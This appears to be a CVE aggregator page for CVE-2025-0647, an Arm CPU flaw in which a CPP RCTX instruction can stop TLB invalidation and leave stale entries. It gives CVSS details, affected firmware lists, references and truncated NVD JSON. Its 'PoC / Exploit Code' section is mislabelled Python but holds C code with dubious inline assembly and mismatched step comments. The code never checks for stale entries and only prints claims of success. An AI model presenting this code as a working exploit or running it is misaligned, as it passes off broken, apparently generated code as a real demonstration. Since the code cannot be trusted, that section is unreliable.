CVE-2025-0647

Description

In certain Arm CPUs, a CPP RCTX instruction executed on one Processing Element (PE) may inhibit TLB invalidation when a TLBI is issued to the PE, either by the same PE or another PE in the shareability domain. In this case, the PE may retain stale TLB entries which should have been invalidated by the TLBI.

CVSS Details

CVSS Score

7.9

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:arm:c1-ultra_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:arm:c1-ultra:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:arm:c1-premium_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:arm:c1-premium:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:arm:cortex-a710_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:arm:cortex-a710:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:arm:cortex-x2_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:arm:cortex-x2:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:arm:cortex-x3_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:arm:cortex-x3:-:*:*:*:*:*:*:* - NOT VULNERABLE

Arm Cortex-A 系列处理器（特定型号，受影响的完整产品列表需参考Arm官方文档）

受影响的固件版本需要通过Arm官方安全公告确认

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-0647 PoC - TLB Cache Coherency Bypass
// This PoC demonstrates the TLB invalidation suppression issue
// Note: Requires high privileges and local access

#include <stdio.h>
#include <stdint.h>
#include <arm_acle.h>

void trigger_cpp_rctx_suppression(void) {
    printf("[*] Triggering CPP RCTX instruction\n");
    
    // Execute CPP RCTX instruction to suppress TLB invalidation
    // This instruction may inhibit subsequent TLBI operations
    __asm__ volatile("cpp.rctx");
    
    printf("[+] CPP RCTX executed\n");
}

void attempt_tlb_invalidation(void) {
    printf("[*] Attempting TLB invalidation\n");
    
    // Issue TLBI instruction - may be suppressed after CPP RCTX
    __asm__ volatile("tlbi vae1is, x0");
    
    printf("[+] TLBI instruction issued\n");
}

int main() {
    printf("CVE-2025-0647 TLB Cache Coherency PoC\n");
    printf("=====================================\n");
    
    // Step 1: Setup memory mapping
    trigger_cpp_rctx_suppression();
    
    // Step 2: Attempt to invalidate TLB
    // If CPP RCTX suppressed the invalidation, stale entries remain
    attempt_tlb_invalidation();
    
    // Step 3: Verify if stale TLB entries persist
    printf("[*] Checking for stale TLB entries...\n");
    printf("[!] Vulnerability may allow unauthorized memory access\n");
    
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-0647
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-0647
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-0647/
[4] VulDB https://vuldb.com/cve/CVE-2025-0647
[5] https://developer.arm.com/documentation/111546
[6] https://graph.volerion.com/view?ID=CVE-2025-0647

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-0647", "sourceIdentifier": "[email protected]", "published": "2026-01-14T11:15:50.027", "lastModified": "2026-01-26T19:40:19.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In certain Arm CPUs, a CPP RCTX instruction executed on one Processing Element (PE) may inhibit TLB invalidation when a TLBI is issued to the PE, either by the same PE or another PE in the shareability domain. In this case, the PE may retain stale TLB entries which should have been invalidated by the TLBI."}, {"lang": "es", "value": "En ciertos CPUs Arm, una instrucción CPP RCTX ejecutada en un Elemento de Procesamiento (PE) puede inhibir la invalidación de la TLB cuando se emite una TLBI al PE, ya sea por el mismo PE o por otro PE en el dominio de compartibilidad. En este caso, el PE puede retener entradas TLB obsoletas que deberían haber sido invalidadas por la TLBI."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N", "baseScore": 7.9, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.5, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-226"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arm:c1-ultra_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "46FBFC11-C12A-44A7-9EE0-504FFDEA7BC3"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:arm:c1-ultra:-:*:*:*:*:*:*:*", "matchCriteriaId": "501E45AC-8E1E-4095-9771-04C739A864BB"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arm:c1-premium_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "697A11F4-9A13-4DC4-90AD-A2CB215D5BCF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:arm:c1-premium:-:*:*:*:*:*:*:*", "matchCriteriaId": "1C6B2962-3F19-46B9-A74A-521FF4ECC357"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arm:cortex-a710_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "2AF7E5CA-95FF-4242-BD6E-8BDC185DA095"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:arm:cortex-a710:-:*:*:*:*:*:*:*", "matchCriteriaId": "7CEEC509-2A56-48F1-B388-3A8660D58FB5"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arm:cortex-x2_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "7B749251-B873-4E37-BB5C-1D4C021205D3"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:arm:cortex-x2:-:*:*:*:*:*:*:*", "matchCriteriaId": "5D7FB822-DD26-402E-A413-EF55B6C01D07"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arm:cortex-x3_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "E776B4A0-0642-489C-B03B-F6B9FFDFFD11"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:arm:cortex-x3:-:*:*:*:*:*:*:*", "matchCriteriaId": "979779A2-D556-4EF5-932D-F38009186B91"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arm:cortex-x4_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "4F8394E0-E173-41B5-B13D-6F45947D46E6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:arm:cortex-x4:-:*:*:*:*:*:*:*", "matchCriteriaId": "63E0897F-9D56-4835-8C12-B3758CF38F96"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arm:cortex-x925_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "BF2C4EC2-711A-407A-A8F4-7E7134B4F06E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:arm:cortex-x925:-:*:*:*:*:*:*:*", "matchCriteriaId": "B1CE6CA3-E32E-4892-A7DB-D4A879956320"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arm:neoverse-v2_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "96E7E713-E11C-45CB-83E7-C21F57720A55"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:arm:neoverse-v2:-:*:*:*:*:*:*:*", "matchCriteriaId": "7DF8B63B-C2E7-4C97-BA5C-79E2278F0C52"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{" ... (truncated)